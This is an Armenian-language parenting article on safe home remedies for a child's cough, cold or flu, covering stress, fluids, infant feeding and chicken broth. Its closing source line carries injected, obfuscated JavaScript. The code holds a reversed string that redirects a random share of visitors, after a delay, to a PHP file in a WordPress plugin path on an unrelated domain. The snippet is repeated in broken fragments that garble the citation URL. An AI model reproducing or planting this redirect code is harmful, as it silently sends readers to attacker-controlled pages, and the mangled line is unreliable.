Անվտանգ տնային միջոցներ` ձեր երեխայի հազի, մրսածության կամ գրիպի դեմ

Գրիպի և հազի դեմ ժամանակակից դեղամիջոցների օգտագործումը կարող է վտանգավոր լինել մինչև 4 տարեկան երեխաների առողջության համար։ Բարեբախտաբար, անվտանգ և արդյունավետ միջոցներ կան, որոնք տնային պայմաններում կօգնեն հաղթահարել վերոնշյալ հիվանդությունները։

Հատկանշական է, որ ուսումնասիրությունների արդյունքում պարզվել է, որ սթրեսն իր ազդեցությունն է ունենում հիվանդության խորացման վրա: Եթե երեխան որևէ դժվարություն է զգում դպրոցում, ընկերների հետ կամ տանը,  ապա նա փոփոխությունների կարիք ունի։ Անհրաժեշտ է հանգստի համապատասխան տարբերակներ գտնել երեխայի միտքը զբաղեցնելու համար։

Մասնագետները նշում են, որ շատ հեղուկ խմելը ևս կարող է օգնել ձեր երեխային հիվանդություններից զերծ պահելու համար՝ կանխելով օրգանիզմի ջրազրկումը: Եթե ձեր երեխան 12 ամսականից փոքր է, կրծքով կամ շշով արհեստական կաթի կերակրումը լավագույն միջոցն է։ Ավելի մեծ երեխաների համար պարզապես շատ ջուր խմելը նույնպես օգտակար կարող է լինել։

Ուսումնասիրությունները նաև ցույց են տալիս, որ հավի արգանակը թեթևացնում է մրսածության ախտանիշները՝ ցավերը, հոգնածությունը, բարձր ջերմությունը։

Աղբյուր՝ $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-soothe-your-childs-cold-and-flu-symptoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to_10014077.bc?fbclid=IwAR1FzC0OhwqCsuBBlMCcpAkCVey4heSWdxpSw7Mt17bNzv7aTKwyWkHnEE4″ target=”_blank” rel=”noopener”>babycenter.com